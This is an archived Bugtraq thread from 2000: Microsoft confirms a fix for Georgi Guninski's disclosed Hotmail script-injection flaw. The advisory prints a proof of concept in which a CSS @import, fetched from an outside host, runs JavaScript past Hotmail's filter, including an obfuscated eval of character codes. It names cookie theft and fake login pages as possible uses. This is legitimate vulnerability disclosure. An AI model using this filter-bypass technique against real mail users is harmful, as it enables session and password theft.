Bugtraq mailing list archives
Re: Hotmail security hole - injecting JavaScript in IE using "@im port url(http://host/hostile.css)"
From: secure () MICROSOFT COM (Microsoft Security Response Center)
Date: Mon, 24 Apr 2000 18:11:54 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hi All - Wanted to advise that we've already corrected our servers to eliminate this vulnerability as of 4:00 PM PST today. Regards, Secure () microsoft com - -----Original Message----- From: Georgi Guninski [mailto:joro () NAT BG] Sent: Monday, April 24, 2000 6:09 AM To: BUGTRAQ () SECURITYFOCUS COM Subject: Hotmail security hole - injecting JavaScript in IE using "@import url(http://host/hostile.css)" Georgi Guninski security advisory #11, 2000 Hotmail security hole - injecting JavaScript in IE using "@import url(http://host/hostile.css)" Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Hotmail allows executing JavaScript code in email messages using "@import url(http://host/hostile.css)", which may compromise user's Hotmail mailbox when viewed with Internet Explorer. Details: Several months ago in my Advisory #3, 2000 I alerted about a Hotmail bug with "@import url(javascript:...)". It was fixed, but now I found a similar bug. There is a new security flaw in Hotmail which allows injecting and executing JavaScript code in an email message using the the <STYLE> tag, @import and the "javascript:" protocol. This exploit works on Internet Explorer. Hotmail tries to filter JavaScript code for security reasons. Executing JavaScript when the user opens Hotmail email message allows for example displaying a fake login screen where the user enters his password which is then stolen. I don't want to make a scary demonstration, but it is also possible to read user's messages, to send messages from user's name and doing other mischief. It is also possible to get the cookie from Hotmail, which is dangerous. Hotmail deliberately escapes all JavaScript (it can escape) to prevent such attacks, but obviously there are holes. The following JavaScript is executed if embedded in a HTML message: - ------------------------------------------- <STYLE type=text/css> @import url(http://www.nat.bg/~joro/test.css); </STYLE> - ------------------------------------------- where http://www.nat.bg/~joro/test.css contains: - ------------------------------------------- @import url(javascript:alert('JavaScript is executed')); @import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101, 115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39 ,41,59))); - ------------------------------------------- Workaround: Disable Active Scripting before viewing a Hotmail message or don't use IE NOTE: Do not ask me to crack Hotmail accounts, I do not do that. Copyright 2000 Georgi Guninski Regards, Georgi Guninski http://www.nat.bg/~joro -----BEGIN PGP SIGNATURE----- Version: PGP 6.0.2 iQEVAwUBOQTw2I0ZSRQxA/UrAQHErgf+I1V9zlEmPlTwizKGItGtn70ZQslVTlKd 6IAf5lVsymo1jRjeocD4xpIzunT2ZKHRbBAPAb5y6pfHF9+qpxZBK3L5w+evX+9/ bhlyz0GHfNeTcQYy2f1OdoA6habUEk9gWIzRmMiePXf8+5abaI+iMkEmkGzwg2Js 4Rs0nXV9a1RptnLWNN06eWl6fAJDIW4mYtzvi8K8KEUucp7EhZDFeO+RZcBx2V6U OHTBcYdI3x6HN8SBXgkHUf4IJwylmaH8HgF0WGQMc9yZDBeQ9j5blkw61SQqhqbD QNiMG7CEr92+lFC/jE38f0RSTUr5hV8AR/nqCIpQnSVJ4I4pGTyjIQ== =X/Mw -----END PGP SIGNATURE-----
Current thread:
- Re: Hotmail security hole - injecting JavaScript in IE using "@im port url(http://host/hostile.css)" Microsoft Security Response Center (Apr 24)